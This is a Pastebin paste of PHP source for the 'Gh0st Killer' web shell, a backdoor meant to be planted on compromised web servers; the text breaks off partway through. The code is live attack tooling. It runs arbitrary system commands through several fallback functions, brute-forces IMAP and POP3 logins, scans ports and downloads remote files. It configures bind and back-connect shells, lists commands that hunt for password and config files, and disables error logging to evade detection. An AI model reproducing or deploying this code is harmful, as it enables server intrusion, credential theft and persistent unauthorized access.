thez3r0

Gh0st Killer SHELL

Aug 17th, 2015
1,650
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 260.90 KB | None | 0 0
  1. <?php
  2. //Authentication
  3. $lock = "on"; // set this to off if you dont need the login page
  4. $user = "gh0st";
  5. $pass = "kill3r";
  6. $antiCrawler        = "on"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
  7. $tracebackFeature   = "on"; // set this feature to on to enable email alerts
  8. $log_email = "thez3r0@outlook.com"; //Default e-mail for sending logs
  9.  
  10. @ignore_user_abort(TRUE);
  11. @set_magic_quotes_runtime(0);
  12. error_reporting(5);
  13. $phpVersion = phpversion();
  14. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  15. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  16. $shver = "1.0"; //Current version
  17. if (!function_exists("getmicrotime")) {
  18.  function getmicrotime() {
  19.   list($usec, $sec) = explode(" ", microtime());
  20.   return ((float)$usec + (float)$sec);
  21.   }
  22.  }
  23.  
  24. define("starttime",getmicrotime());
  25.  
  26. if (get_magic_quotes_gpc()) {
  27.  if (!function_exists("strips")) {
  28.   function strips(&$arr,$k="") {
  29.    if (is_array($arr)) {
  30.     foreach($arr as $k=>$v) {
  31.      if (strtoupper($k) != "GLOBALS") {
  32.       strips($arr["$k"]);
  33.       }
  34.      }
  35.      } else {
  36.     $arr = stripslashes($arr);
  37.     }
  38.     }
  39.     }
  40.     strips($GLOBALS);
  41. }
  42.  
  43. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  44. if (!empty($unset_surl)) {setcookie("ghost_surl"); $surl = "";}
  45. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("ghost_surl",$surl);}
  46. else {$surl = $_REQUEST["ghost_surl"]; //Set this cookie for manual SURL
  47.  
  48. }
  49. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  50. if ($surl_autofill_include and !$_REQUEST["ghost_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  51.  
  52. if (empty($surl))
  53. { $surl = "?".$includestr; }//Self url
  54. $surl = htmlspecialchars($surl);
  55. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  56.  
  57. $welcome = "(: Gh0st_Fl33t Priv8 Shell :)";
  58. //DON'T FORGOT ABOUT PASSWORD!!!
  59.  
  60. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  61. $gzipencode = False; //Encode with gzip?
  62.  
  63. $ax4 ="http://";
  64. $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  65.  
  66. $donated_html = "<center><b>Owned by z3r0</b></center>";
  67. $release = @php_uname('r');
  68. $kernel = @php_uname('s');
  69. $expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text=';
  70. if( strpos('Linux', $kernel) !== false )
  71.     $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
  72. else
  73.     $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  74.  
  75. /* If you publish free shell and you wish add link to your site or any other information, put here your html. */
  76.  
  77. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  78.  
  79. $curdir = "./"; //start folder
  80.  
  81. //$curdir = getenv("DOCUMENT_ROOT");
  82. $curdir = getcwd();
  83. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  84.  
  85. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  86.  
  87.  
  88. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  89.  
  90. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  91.  
  92. if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
  93. function imaplogiN($host,$username,$password){
  94. $sock=fsockopen($host,143,$n,$s,5);
  95. $b=namE();
  96. $l=strlen($b);
  97. if(!$sock)return -1;
  98. fread($sock,1024);
  99. fputs($sock,"$b LOGIN $username $password\r\n");
  100. $res=fgets($sock,$l+4);
  101. if ($res == "$b OK")return 1;else return 0;
  102. fclose($sock);
  103. }
  104. function pop3logiN($server,$user,$pass){
  105. $sock=fsockopen($server,110,$en,$es,5);
  106. if(!$sock)return -1;
  107. fread($sock,1024);
  108. fwrite($sock,"user $user\n");
  109. $r=fgets($sock);
  110. if($r{0}=='-')return 0;
  111. fwrite($sock,"pass $pass\n");
  112. $r=fgets($sock);
  113. fclose($sock);
  114. if($r{0}=='+')return 1;
  115. return 0;
  116. }
  117. function check_urL($url,$method,$search,$timeout){
  118. if(empty($search))$search='200';
  119. $u=parse_url($url);
  120. $method=strtoupper($method);
  121. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  122. $data=(!empty($u['query']))?$u['query']:'';
  123. if(!empty($data))$data="?$data";
  124. $sock=@fsockopen($host,80,$en,$es,$timeout);
  125. if($sock){
  126. fputs($sock,"$method $file$data HTTP/1.0\r\n");
  127. fputs($sock,"Host: $host\r\n");
  128. if($method=='GET')fputs($sock,"\r\n");
  129. elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
  130. else return 0;
  131. if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
  132. while(!feof($sock)){
  133. $res=trim(fgets($sock));
  134. if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
  135. }
  136. fclose($sock);
  137. }
  138. return 0;
  139. }
  140. function snmpchecK($ip,$com,$timeout){
  141. $res=0;
  142. $n=chr(0x00);
  143. $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)).
  144. $com. chr(0xA0).
  145. chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
  146. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
  147. chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
  148. chr(0x01). chr(0x01). $n. chr(0x05). $n;
  149. $sock=@fsockopen("udp://$ip",161);
  150. socket_set_timeout($sock,$timeout);
  151. @fputs($sock,$packet);
  152. socket_set_timeout($sock,$timeout);
  153. $res=fgets($sock);
  154. fclose($sock);
  155. return $res;
  156. }
  157. function checkthisporT($ip,$port,$timeout,$type=0){
  158. if(!$type){
  159. $scan=@fsockopen($ip,$port,$n,$s,$timeout);
  160. if($scan){fclose($scan);return 1;}
  161. }
  162. elseif(function_exists('socket_set_timeout')){
  163. $scan=@fsockopen("udp://".$ip,$port);
  164. if($scan){
  165. socket_set_timeout($scan,$timeout);
  166. @fwrite($scan,"\x00");
  167. $s=time();
  168. fread($scan,1);
  169. if((time()-$s)>=$timeout){fclose($scan);return 1;}
  170. }
  171. }
  172. return 0;
  173. }
  174. function get_sw_namE($host,$timeout){
  175. $sock=@fsockopen($host,80,$en,$es,$timeout);
  176. if($sock){
  177. $page=namE().namE();
  178. fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
  179. while(!feof($sock)){
  180. $con=fgets($sock);
  181. if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
  182. }
  183. fclose($sock);
  184. return -1;
  185. }return 0;
  186. }
  187. function getDisabledFunctions(){
  188.     if(!ini_get('disable_functions'))
  189.     {
  190.         echo "None";
  191.     }
  192.     else
  193.     {
  194.             echo @ini_get('disable_functions');
  195.     }
  196. }
  197. function showsizE($size){
  198. if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  199. elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  200. elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  201. else $size .= " B";
  202. return $size;
  203. }
  204. function whereistmP(){
  205. $uploadtmp=ini_get('upload_tmp_dir');
  206. $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  207. if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  208. if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  209. if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  210. if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  211. if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  212. return ".";
  213. }
  214. function downloadiT($get,$put){
  215. $fo=@strtolower(ini_get('allow_url_fopen'));
  216. if($fo || $fo=='on')$con=file_get_contents($get);
  217. else{
  218. $u=parse_url($get);
  219. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  220. $url=fsockopen($host, 80, $en, $es, 12);
  221. fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
  222. $tmp=$con='';
  223. while($tmp!="\r\n")$tmp=fgets($url);
  224. while(!feof($url))$con.=fgets($url);
  225. }
  226. $mk=file_put_contents($put,$con);
  227. if($mk)return 1;
  228. return 0;
  229. }
  230. function flusheR(){
  231. flush();@ob_flush();
  232. }
  233. function namE(){
  234. $name='';
  235. srand((double)microtime()*100000);
  236. for ($i=0;$i<=rand(3,10);$i++){
  237. $name.=chr(rand(97,122));
  238. }
  239. return $name;
  240. }
  241. function hlinK($str=""){
  242. $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');
  243. $ret=$_SERVER['PHP_SELF']."?";
  244. $new=explode("&",$str);
  245. foreach ($_GET as $key => $v){
  246. $add=1;
  247. foreach($new as $m){
  248. $el = explode("=", $m);
  249. if ($el[0]==$key)$add=0;
  250. }
  251. if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
  252. }
  253. $ret.=$str;
  254. return $ret;
  255. }
  256. function shelL($command){
  257. global $windows,$disablefunctions;
  258. $exec = '';$output= '';
  259. $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  260. if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
  261. elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
  262. elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
  263. elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
  264. elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
  265. elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
  266. elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
  267. return $exec;
  268. }
  269. // Registered file-types.
  270. //  array(
  271. //   "{action1}"=>array("ext1","ext2","ext3",...),
  272. //   "{action2}"=>array("ext4","ext5","ext6",...),
  273. //   ...
  274. //  )
  275. $ftypes  = array(
  276.  "html"=>array("html","htm","shtml"),
  277.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  278.  "exe"=>array("sh","install","bat","cmd"),
  279.  "ini"=>array("ini","inf"),
  280.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  281.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  282.  "sdb"=>array("sdb"),
  283.  "phpsess"=>array("sess"),
  284.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  285. );
  286. // Registered executable file-types.
  287. //  array(
  288. //   string "command{i}"=>array("ext1","ext2","ext3",...),
  289. //   ...
  290. //  )
  291. //   {command}: %f% = filename
  292. $exeftypes  = array(
  293.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  294.  "perl %f%" => array("pl","cgi")
  295. );
  296. /* Highlighted files.
  297.   array(
  298.    i=>array({regexp},{type},{opentag},{closetag},{break})
  299.    ...
  300.   )
  301.   string {regexp} - regular exp.
  302.   int {type}:
  303. 0 - files and folders (as default),
  304. 1 - files only, 2 - folders only
  305.  string {opentag} - open html-tag, e.g. "<b>" (default)
  306.   string {closetag} - close html-tag, e.g. "</b>" (default)
  307.   bool {break} - if TRUE and found match then break
  308. */
  309. $regxp_highlight  = array(
  310.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  311.   array("config.php",1) // example
  312. );
  313. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  314.  // array (i=>{letter} ...); string {letter} - letter of a drive
  315. //$safemode_diskettes = range("a","z");
  316. $hexdump_lines = 8;// lines in hex preview file
  317. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  318. $cx7 =".com";
  319. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  320. $bindport_pass = "cyb3r";  // default password for binding
  321. $bindport_port = "31373"; // default port for binding
  322. $bc_port = "31373"; // default port for back-connect
  323. $cx4 ="/x.";
  324. $datapipe_localport = "8081"; // default port for datapipe
  325. // Command-aliases
  326. if (!$win)
  327. {
  328.  $cmdaliases = array(
  329.   array("-----------------------------------------------------------", "ls -la"),
  330.   array("find all suid files", "find / -type f -perm -04000 -ls"),
  331.   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  332.   array("find all sgid files", "find / -type f -perm -02000 -ls"),
  333.   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  334.   array("find config.inc.php files", "find / -type f -name config.inc.php"),
  335.   array("find config* files", "find / -type f -name \"config*\""),
  336.   array("find config* files in current dir", "find . -type f -name \"config*\""),
  337.   array("find all writable folders and files", "find / -perm -2 -ls"),
  338.   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  339.   array("find all service.pwd files", "find / -type f -name service.pwd"),
  340.   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  341.   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  342.   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  343.   array("find all .bash_history files", "find / -type f -name .bash_history"),
  344.   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  345.   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  346.   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  347.   array("list file attributes on a Linux second extended file system", "lsattr -va"),
  348.   array("show opened ports", "netstat -an | grep -i listen")
  349.  );
  350. }
  351. else
  352. {
  353.  $cmdaliases = array(
  354.   array("-----------------------------------------------------------", "dir"),
  355.   array("show opened ports", "netstat -an")
  356.  );
  357. }
  358. $sess_cookie = "Gh0st_cookie"; // Cookie-variable name
  359. $usefsbuff = TRUE; //Buffer-function
  360. $px7 ="html";  
  361. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  362. //Quick launch
  363. $quicklaunch = array(
  364.  array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  365.  array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  366.  array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  367.  array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  368.  array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  369.  array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  370.  array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  371.  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  372.  array("<b>Shell</b>",$surl."act=shells&d=%d"),
  373.  array("<b>Cracker</b>",$surl."act=cracker&d=%d"),
  374.  array("<b>Scanner</b>",$surl."act=scanner&d=%d"),
  375.  array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),
  376.  array("<b>SQL</b>",$surl."act=sql&d=%d"),
  377.  array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),
  378.  array("<b>Mailer</b>",$surl."act=mailer&d=%d"),   //update this section copy from b3t4k shell
  379.  array("<b>DOS</b>",$surl."act=dos&d=%d"),   //update this section copy from b3t4k shell
  380.  array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell
  381.  array("<b>Upload</b>",$surl."act=upload&d=%d"),
  382.  array("<b>About</b>",$surl."act=about&d=%d"),   //update this section copy from b3t4k shell
  383.  );
  384. //Highlight-code colors
  385. $highlight_background = "#660000";
  386. $highlight_bg = "#FFCCCC";
  387. $highlight_comment = "#6A6A6A";
  388. $highlight_default = "#0000BB";
  389. $highlight_html = "#1300FF";
  390. $highlight_keyword = "#007700";
  391. $highlight_string = "#000000";
  392. @$f = $_REQUEST["f"];
  393. @extract($_REQUEST["cyb3rcook"]);
  394. //END CONFIGURATION
  395. // -------------- Traceback Functions
  396. function sendLoginAlert()
  397. {
  398.     global $ownerEmail;
  399.     global $url;
  400.     $ref=$_SERVER['HTTP_REFERER'];
  401.     $agent=$_SERVER['HTTP_USER_AGENT'];
  402.     $accesedIp = $_SERVER['REMOTE_ADDR'];
  403.     $randomInt = rand(0,1000000);           # to avoid id blocking
  404.    $from = "t-rax$randomInt@cyber.world.com";
  405.      //echo $from;
  406.      if(function_exists('mail'))
  407.     {
  408.         $subject = "Shell Accessed -- Gh0st-Killer --";
  409.         $message = "
  410. Hey  ,
  411.        
  412.        Your Shell(Gh0st-killer) located at $url was accessed by $accesedIp this mail referred  by $ref
  413.         Your shell was accessed by $agent
  414.    
  415.        If its not you :-
  416.        
  417.        1. Enjoy the Shell :)
  418.  
  419.        -gh0st-killer
  420.  
  421.        ";
  422.         mail($ownerEmail,$subject,$message,'From:'.$from);
  423.     }
  424. }
  425.  
  426. //---------------------------------------------------------
  427. if(function_exists('session_start') && $lock == 'on')
  428. {
  429.     session_start();
  430. }
  431. else
  432. {
  433.     // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
  434.     $lock = 'off';
  435. }
  436.  
  437. //logout
  438. if(isset($_GET['logout']) && $lock == 'on')
  439. {
  440.     $_SESSION['authenticated'] = 0;
  441.     session_destroy();
  442.     header("location: ".$_SERVER['PHP_SELF']);
  443. }
  444.  
  445. /***************** Restoring *******************************/
  446. ini_restore("safe_mode_include_dir");
  447. ini_restore("safe_mode_exec_dir");
  448. ini_restore("disable_functions");
  449. ini_restore("allow_url_fopen");
  450. ini_restore("safe_mode");
  451. ini_restore("open_basedir");
  452. if(function_exists('ini_set'))
  453. {
  454.     ini_set('error_log',NULL);  // No alarming logs
  455.     ini_set('log_errors',0);    // No logging of errors
  456.     ini_set('file_uploads',1);  // Enable file uploads
  457.     ini_set('allow_url_fopen',1);   // allow url fopen
  458. }
  459.  
  460. else
  461. {
  462.     ini_alter('error_log',NULL);
  463.     ini_alter('log_errors',0);
  464.     ini_alter('file_uploads',1);
  465.     ini_alter('allow_url_fopen',1);
  466. }
  467. // ----------------------------------------------------------------------------------------------------------------
  468. // \/Next code isn't for editing\/
  469. @set_time_limit(0);
  470. $tmp = array();
  471. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  472. $s = "!^(".implode("|",$tmp).")$!i";
  473. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  474. ?>
  475. <html>
  476. <head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
  477. <title> | Gh0st-killer |  - <?php echo getenv("HTTP_HOST"); ?></title>
  478. <?php
  479. if($antiCrawler != 'off')
  480. {
  481.     ?>
  482.     <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  483.     <?php
  484. }
  485. ?>
  486. <STYLE>
  487. TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>
  488. </head>
  489. <BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
  490. <?php
  491. if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
  492. {
  493.     if( $_POST['user'] == $user &&
  494.          $_POST['pass'] == $pass )
  495.     {
  496.             $_SESSION['authenticated'] = 1;
  497.             // --------------------- Tracebacks --------------------------------
  498.             if($tracebackFeature == 'On')
  499.             {
  500.                 sendLoginAlert();
  501.             }
  502.             // ------------------------------------------------------------------
  503.     }
  504. }
  505.  
  506. if($lock == 'off')
  507. {?>
  508.     <p><font color=red><b>Shell open for ever one </b></font></p>
  509. <?php
  510. }
  511.  
  512. if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
  513. {
  514.  
  515. ?>
  516. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>
  517. <tr><td valign='top'><center><font face="times, serif" size="3" color="white">Gh0st<b><font color=orange> killer</font> Private<font color=green> Shell</font></b>.</font></center></td>
  518. </tr>
  519. </table>
  520. <br/>
  521.  
  522.  
  523. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>
  524. <tr>
  525.  
  526. <td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>
  527. <td><center><img src="http://----.jpg" width="352px" height="500px"/></center></td>
  528. </tr>
  529. </table>
  530. <div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >
  531. <center><font face="times, serif" color="white">
  532.      <h1><?php echo $welcome; ?></h1><br /><br />
  533.       <form method="POST" action="">
  534.       <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Let me in!"/>
  535.       </form>
  536.       <font size="3">Coded by z3r0 for Gh0st-Fl33T<br/><br/>
  537.      
  538.       Jai Hind</font>
  539.      
  540.       </font>
  541. </center>
  542. </div>
  543. <br/>
  544. <?php
  545. }
  546. //---------------------------------- We are authenticated now-------------------------------------
  547. //Launch the shell
  548. else
  549. {
  550.  
  551. if ($act != "img")
  552.  
  553. {
  554.  
  555. $lastdir = realpath(".");
  556.  
  557. chdir($curdir);
  558.  
  559. if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}
  560.  
  561. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  562.  
  563. if (!is_array($sess_data)) {$sess_data = array();}
  564.  
  565. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  566.  
  567. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  568.  
  569.  
  570.  
  571. $disablefunc = @ini_get("disable_functions");
  572.  
  573. if (!empty($disablefunc))
  574.  
  575. {
  576.  
  577.  $disablefunc = str_replace(" ","",$disablefunc);
  578.  
  579.  $disablefunc = explode(",",$disablefunc);
  580.  
  581. }
  582.  
  583.  
  584.  
  585. if (!function_exists("cyb3r_buff_prepare"))
  586.  
  587. {
  588.  
  589. function cyb3r_buff_prepare()
  590.  
  591. {
  592.  
  593.  global $sess_data;
  594.  
  595.  global $act;
  596.  
  597.  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  598.  
  599.  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  600.  
  601.  $sess_data["copy"] = array_unique($sess_data["copy"]);
  602.  
  603.  $sess_data["cut"] = array_unique($sess_data["cut"]);
  604.  
  605.  sort($sess_data["copy"]);
  606.  
  607.  sort($sess_data["cut"]);
  608.  
  609.  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  610.  
  611.  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  612.  
  613. }
  614.  
  615. }
  616.  
  617. cyb3r_buff_prepare();
  618.  
  619. if (!function_exists("ghost_dat"))
  620.  
  621. {
  622.  
  623. function ghost_dat($data)
  624.  
  625. {
  626.  
  627.  global $sess_cookie;
  628.  
  629.  global $sess_data;
  630.  
  631.  cyb3r_buff_prepare();
  632.  
  633.  $sess_data = $data;
  634.  
  635.  $data = serialize($data);
  636.  
  637.  setcookie($sess_cookie,$data);
  638.  
  639. }
  640.  
  641. }
  642.  
  643. foreach (array("sort","sql_sort") as $v)
  644.  
  645. {
  646.  
  647.  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  648.  
  649.  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  650.  
  651. }
  652.  
  653. if ($sort_save)
  654.  
  655. {
  656.  
  657.  if (!empty($sort)) {setcookie("sort",$sort);}
  658.  
  659.  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  660.  
  661. }
  662.  
  663. if (!function_exists("str2mini"))
  664.  
  665. {
  666.  
  667. function str2mini($content,$len)
  668.  
  669. {
  670.  
  671.  if (strlen($content) > $len)
  672.  
  673.  {
  674.  
  675.   $len = ceil($len/2) - 2;
  676.  
  677.   return substr($content, 0,$len)."...".substr($content,-$len);
  678.  
  679.  }
  680.  
  681.  else {return $content;}
  682.  
  683. }
  684.  
  685. }
  686.  
  687. if (!function_exists("view_size"))
  688.  
  689. {
  690.  
  691. function view_size($size)
  692.  
  693. {
  694.  
  695.  if (!is_numeric($size)) {return FALSE;}
  696.  
  697.  else
  698.  
  699.  {
  700.  
  701.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  702.  
  703.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  704.  
  705.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  706.  
  707.   else {$size = $size . " B";}
  708.  
  709.   return $size;
